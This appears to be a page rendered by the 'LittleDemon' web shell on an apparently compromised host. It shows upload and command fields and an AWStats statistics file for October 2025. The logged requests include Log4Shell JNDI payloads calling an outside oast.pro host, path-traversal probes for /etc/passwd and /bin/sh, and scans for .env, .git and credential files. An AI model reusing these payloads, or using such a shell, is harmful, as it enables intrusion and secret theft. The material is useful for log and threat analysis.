LittleDemon WebShell


Linux hosting100.raksmart.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Path : /home/zqegovsj/tmp/awstats/ssl/
File Upload :
Command :
Current File : /home/zqegovsj/tmp/awstats/ssl/awstats102025.chinaxingwei.us3web.haibo.net.txt

AWSTATS DATA FILE 7.9 (build 20230108)
# If you remove this file, all statistics for date 202510 will be lost/reset.
# Last config file used to build this data file was /home/zqegovsj/tmp/awstats/ssl/awstats.chinaxingwei.us3web.haibo.net.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2064                
POS_TIME 2724                
POS_VISITOR 11309               
POS_DAY 12855               
POS_DOMAIN 3404                
POS_LOGIN 3724                
POS_ROBOT 3879                
POS_WORMS 4250                
POS_EMAILSENDER 4381                
POS_EMAILRECEIVER 4524                
POS_SESSION 13417               
POS_FILESIZE 13688               
POS_SIDER 13585               
POS_FILETYPES 4659                
POS_DOWNLOADS 4778                
POS_OS 4826                
POS_BROWSER 5205                
POS_SCREENSIZE 6466                
POS_UNKNOWNREFERER 6540                
POS_UNKNOWNREFERERBROWSER 7573                
POS_ORIGIN 8357                
POS_SEREFERRALS 8490                
POS_PAGEREFS 8634                
POS_SEARCHWORDS 8814                
POS_KEYWORDS 8966                
POS_MISC 2387                
POS_ERRORS 9025                
POS_CLUSTER 3580                
POS_SIDER_404 9117                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20251101014149 1 0 17184863663261
FirstTime 0
LastTime 20251028162837
LastUpdate 20251101121252 1 0 0 0 0
TotalVisits 42                  
TotalUnique 36                  
MonthHostsKnown 0                   
MonthHostsUnknown 37                  
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
FlashSupport 0 0 0
PDFSupport 0 0 0
DirectorSupport 0 0 0
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
RealPlayerSupport 0 0 0
AddToFavourites 0 17 0
TotalMisc 0 0 0
WindowsMediaPlayerSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 1 9 3209843 19 22 259019
1 0 0 0 0 0 0
2 5 11 2323867 0 4 29590
3 5 5 199985 28 29 446229
4 3 3 120341 3 5 129055
5 2 2 79994 4 5 178346
6 0 0 0 1 2 29590
7 1 10 2937412 5 11 1255775
8 0 0 0 1 1 40347
9 1 5 1405798 1 2 29590
10 2 5 1142460 1 3 58437
11 4 6 480175 2 3 46548
12 0 0 0 1 1 40347
13 4 4 161038 2 10 97422
14 2 3 384432 2 5 63506
15 0 0 0 1 1 14795
16 1 1 39997 0 1 16958
17 2 2 80694 1 2 31753
18 2 3 383679 1 1 14795
19 12 12 480314 85 94 1397219
20 11 11 439967 21 21 133155
21 7 10 1342095 3 6 137649
22 0 0 0 0 0 0
23 0 0 0 1 1 14795
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 7
cn 33 36 2381667
us 16 21 2022955
ru 4 24 7289715
de 4 10 2133859
ca 4 4 161038
in 3 3 120744
nl 1 4 1102113
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 6
no_user_agent 9 361723 20251027034518 0
survey 6 242082 20251014075839 0
(firefox/)([0-9]\.|[0-1][0]\.) 4 1102113 20251004074856 0
bot[\s_+:,\.\;\/\\-] 2 41479 20251015101641 1
scrapy 2 80694 20251002213252 0
link 1 40347 20251004002420 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 3
html 63 2526164 0 0
php 2 79994 0 0
js 37 12605933 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 25
linux 22 17
ios_iphone 2 1
macosx12 1 0
Unknown 21 16
macosx6 1 1
win8 2 2
linuxubuntu 2 2
macosx5 1 1
wince 1 1
win8.1 3 2
winphone 2 0
macosx15 10 5
androidkitkat 1 0
macosx14 2 0
winlong 1 1
bsdnetbsd 1 0
macosx13 1 0
winnt 1 1
macosx9 2 2
androidpie 4 0
winxp 1 1
macosx8 1 1
win10 16 9
ios_ipad 1 1
win7 2 1
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 62
chrome114.0.0.0 4 1
chrome58.0.3029.110 3 2
chrome41.0.2226.0 1 1
chrome71.0.3578.80 1 1
chrome136.0.0.0 1 1
chrome35.0.1916.141 1 0
opera8.55 1 1
chrome133.0.0.0 2 2
safari5.1 1 1
chrome62.0.3202.62 1 0
chrome76.0.3809.111 2 0
chrome137.0.0.0 1 1
chrome37.0.880.0 1 1
chrome36.0.871.0 1 1
chrome65.0.3325.162 1 0
chrome124.0.0.0 1 1
chrome13.0.782.41 1 0
opera19.0.1326.56 1 0
opera10.91 1 1
chrome102.0.5005.63 1 1
chrome39.0.868.0 1 1
chrome35.0.3319.102 1 1
chrome41.0.2228.0 1 1
firefox129.0 1 1
chrome44.0.2403.155 1 1
chrome37.0.2049.0 1 1
safari13.0 1 0
mozilla 7 6
chrome75.0.3770.100 1 0
firefox35.0 2 2
firefox55.0 1 1
firefox139.0 1 1
chrome131.0.0.0 2 0
chrome134.0.0.0 6 3
msie11.0 1 1
chrome116.0.0.0 1 1
chrome96.0.4664.110 1 1
chrome40.0.851.0 1 1
chrome49.0.2656.18 1 1
Unknown 15 9
chrome130.0.0.0 1 1
chrome37.0.814.0 1 1
chrome66.0.3359.126 1 0
chrome70.0.3538.102 1 0
opera9.72 1 1
chrome75.0.3770.142 4 0
chrome95.0.4638.69 1 1
opera8.52 1 1
chrome41.0.2227.0 1 1
chrome37.0.852.0 1 1
firefox37.0 1 1
safari4.1 1 1
safari 1 1
opera54.0.2952.71 1 0
safari18.2 1 0
iphone 1 0
chrome139.0.0.0 3 3
chrome110.0.0.0 1 1
chrome76.0.3809.89 1 0
sonyericsson 1 1
chrome38.0.832.0 1 1
msie7.0 2 0
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
SonyEricssonW660i/R6AD_Browser/NetFront/3.3_Profile/MIDP-2.0_Configuration/CLDC-1.1 20251021192724
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d3ru96mph435gkbmgf10rkehy3rgggh8f.oast.pro} 20251021200731
python-httpx/0.28.1 20251018001528
Hello_from_Palo_Alto_Networks,_find_out_more_about_our_scans_in_https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity 20251027051224
nook_browser/1.0 20251021194040
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20251012132439
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d3ru96mph435gkbmgf10qdyfkkqqa9s9g.oast.pro} 20251021201303
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20251028162837
${jndi:ldap://${:-705}${:-425}.${hostName}.useragent.d3ru96mph435gkbmgf103hd5rnkofn63t.oast.pro} 20251021201303
${jndi:ldap://${:-705}${:-425}.${hostName}.useragent.d3ru96mph435gkbmgf10yg6p7676a8yxj.oast.pro} 20251021200731
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 8
nook_browser/1.0 20251021194040
Hello_from_Palo_Alto_Networks,_find_out_more_about_our_scans_in_https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity 20251027051224
${jndi:ldap://${:-705}${:-425}.${hostName}.useragent.d3ru96mph435gkbmgf10yg6p7676a8yxj.oast.pro} 20251021200731
${jndi:ldap://${:-705}${:-425}.${hostName}.useragent.d3ru96mph435gkbmgf103hd5rnkofn63t.oast.pro} 20251021201303
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d3ru96mph435gkbmgf10qdyfkkqqa9s9g.oast.pro} 20251021201303
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d3ru96mph435gkbmgf10rkehy3rgggh8f.oast.pro} 20251021200731
NetSurf/1.2_(NetBSD;_amd64) 20251003023650
python-httpx/0.28.1 20251018001528
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 47 81
From1 4 4
From2 0 0
From3 7 7
From4 7 10
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 1
https://107.149.111.243:443 7 7
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 1
404 179 2308196
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 83
/js/ueditor/ueditor.all.js 2 -
/Jeecg 2 -
/jeecg-boot/jmreport/queryFieldBySql 2 -
/docker/.env 1 -
/app/.env 1 -
/cron/.env 1 -
/env/.env 1 -
/k3cloud 2 -
/jenkins/login 2 -
/dev/.env 1 -
/xxl-job-admin/toLogin 2 -
/actuator 2 -
/pma/ 2 -
/index/ajax/lang 2 -
/jeecg-boot/ 2 -
/prod-api/actuator 2 -
/swagger/index.html 2 -
/_profiler/phpinfo 2 -
/geoserver/ 2 -
/icons/../../../../../../etc/passwd 2 -
/kindeditor/asp/upload_json.asp 2 -
/api/.env 1 -
/wui/index.html 2 -
/appsettings.json 1 -
/api/jmreport/ 2 -
/kindeditor/php/upload_json.php 2 -
/.well-known/security.txt 1 -
/manager/html 2 -
/v2/api-docs 2 -
/webroot/decision/login 2 -
/env.backup 1 -
/WebReport/ReportServer 2 -
/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 2 -
/kindeditor/jsp/upload_json.jsp 2 -
/error 2 -
/new/.env 1 -
/.svn/entries 2 -
/conf/.env 1 -
/cgi-bin/../../../../etc/passwd 2 -
/arcgis/ 2 -
/new/.env.staging 1 -
/shell 4 -
/api/swagger-ui.html 2 -
/docker/app/.env 2 -
/v3/api-docs 2 -
/awstats/.env 1 -
/phpmyadmin/ 2 -
/webshell.php 4 -
/swagger-ui.html 2 -
/.DS_Store 2 -
/.git/config 15 -
//recaptcha.net/recaptcha/api.js 9 -
/_profiler/phpinfo/info.php 1 -
/api/jeecg-boot/ 2 -
/ 2 -
/api/druid/basic.json 2 -
/ReportServer 2 -
/grafana/ 2 -
/prod-api/druid/basic.json 2 -
/aws-secret.yaml 1 -
/minio/ 2 -
/kindeditor/asp.net/upload_json.ashx 2 -
/ueditor/ueditor.all.js 2 -
/xxl-job/toLogin 2 -
/phpinfo.php 2 -
/_profiler/phpinfo/phpinfo.php 1 -
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 2 -
/xxl/toLogin 2 -
/cgi-bin/../../../../../../bin/sh 2 -
/harbor/ 2 -
/static/js/ueditor/ueditor.all.js 2 -
/_phpinfo.php 1 -
/.gitignore 1 -
/prod-api/ 2 -
/shell.php 4 -
/druid/index.html 2 -
/nacos/ 2 -
/geoserver/web/ 2 -
/phpinfo 1 -
/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 2 -
/smartbi/vision/index.jsp 2 -
/.env 6 -
/webshell 4 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 37
115.217.140.49 17 17 679949 20251021201307
122.9.40.48 4 4 159988 20251020030205
176.65.149.195 3 6 1031746 20251024135935
115.190.169.198 3 3 119991 20251026190613
44.193.254.10 2 2 79994 20251021191217
195.178.110.223 2 22 7209371 20251004074748
3.222.165.167 2 2 79994 20251024185113
45.131.155.100 2 2 80397 20251025032532
44.249.3.119 2 7 1460897 20251018001525
123.160.223.73 2 4 1126308 20251021213801
159.203.65.154 1 1 39997 20251022043357
167.94.138.204 1 1 40347 20251012132439
143.198.43.232 1 1 39997 20251020045242
199.45.154.122 1 1 40347 20251008133924
71.6.134.230 1 1 39997 20251021054004
185.247.137.136 1 1 39997 20251028162837
180.184.66.84 1 1 39997 20251026190607
198.235.24.196 1 1 39997 20251020193428
180.184.66.251 1 1 39997 20251020030203
180.184.67.17 1 1 39997 20251020024748
45.131.155.101 1 1 40347 20251009170436
185.33.101.84 1 4 1102113 20251003100038
167.71.230.54 1 1 40347 20251006102849
185.247.137.116 1 1 40347 20251002174504
66.132.153.136 1 1 40347 20251005142410
180.184.64.131 1 1 39997 20251023210728
199.45.154.121 1 1 40347 20251003130015
180.184.67.147 1 1 39997 20251020024747
123.160.223.72 0 1 15452 
198.235.24.241 1 1 40347 20251008113328
71.6.134.231 1 1 40347 20251012194730
142.93.235.175 1 1 40347 20251008114310
101.126.24.20 1 1 39997 20251020030205
213.209.157.216 1 4 1102113 20251003093422
205.210.31.170 1 1 40347 20251003044917
147.185.132.67 1 1 39997 20251027051224
180.184.67.244 1 1 39997 20251023210729
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 23
20251002 1 1 40347 1
20251003 5 17 4448799 5
20251004 1 15 5045492 1
20251005 1 1 40347 1
20251006 2 2 80694 2
20251007 0 1 303685 0
20251008 3 3 121041 3
20251009 1 1 40347 1
20251010 1 1 40347 1
20251011 0 1 303685 0
20251012 2 2 80694 2
20251016 1 1 40400 1
20251017 1 3 359134 1
20251018 1 4 1101763 1
20251020 10 10 399970 7
20251021 22 25 1941700 4
20251022 1 1 39997 1
20251023 4 4 159988 3
20251024 3 3 119991 2
20251025 1 2 343682 1
20251026 2 2 79994 2
20251027 1 1 39997 1
20251028 1 1 39997 1
END_DAY

# Session range - Number of visits
BEGIN_SESSION 3
5mn-15mn 1
0s-30s 40
30mn-1h 1
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 2
/ 63 2526164 42 42
/index.php 2 79994 0 0
END_SIDER

# Payload Range - Payload Frequency
BEGIN_FILESIZE 3
1K-2K 1
0-44 23
5K+ 308
END_FILESIZE

LittleDemon - FACEBOOK
[ KELUAR ]